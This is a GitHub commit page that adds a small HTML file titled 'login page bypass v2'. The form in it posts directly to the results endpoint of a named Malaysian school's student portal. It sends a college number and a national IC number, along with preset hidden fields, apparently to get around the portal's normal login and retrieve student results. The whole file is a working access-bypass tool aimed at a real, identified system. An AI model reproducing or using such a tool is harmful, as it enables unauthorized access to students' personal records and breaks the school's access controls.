-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
37 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<link rel="stylesheet" href="index.css"> | ||
<head> <!-- Fonts --> | ||
<link rel="preconnect" href="https://fonts.googleapis.com"> | ||
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> | ||
<link href="https://fonts.googleapis.com/css2?family=Quicksand&display=swap" rel="stylesheet"> | ||
<meta charset="UTF-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||
<title>login page bypass v2 by hakimi</title> | ||
</head> | ||
<body> | ||
<form class="hello" action="https://mrsmkualaklawang.edu.my/epelajar/KeputusanRedirect.asp" class="imgcontainer" method="POST"> | ||
<label for="uname"><b>ID Pengguna</b></label> | ||
<input name="hfNoMaktab" type="text" required id="hfNoMaktab" placeholder="Nombor Maktab"> | ||
<h1></h1> | ||
<label for="psw"><b>Katalaluan</b></label> | ||
<input name="hfKP" id="hfKP" type="text" placeholder="Nombor IC" required> | ||
<input name="cboSem" id="cboSem" type="hidden" value="2"> | ||
<input name="cboPep" id="cboPep" type="hidden" value="u1"> | ||
<h1></h1> | ||
|
||
<button id="btn" class="button11 button111" type="submit">Log In</button> | ||
<label> | ||
|
||
</label> | ||
</form> | ||
</body> | ||
|
||
<footer> | ||
<p><a style="text-decoration: none;" href="https://github.com/Hakimi0804/Hakimi0804.github.io/tree/main/esppng-system-bypass">Source Code</a></p> | ||
<p>By <a style="text-decoration: none;" href="https://github.com/Hakimi0804"><b>Hakimi</b></a> (4 AB)</p> | ||
<p>v2</p> | ||
</footer> | ||
|
||
<script src="index.js"></script> | ||
</html> |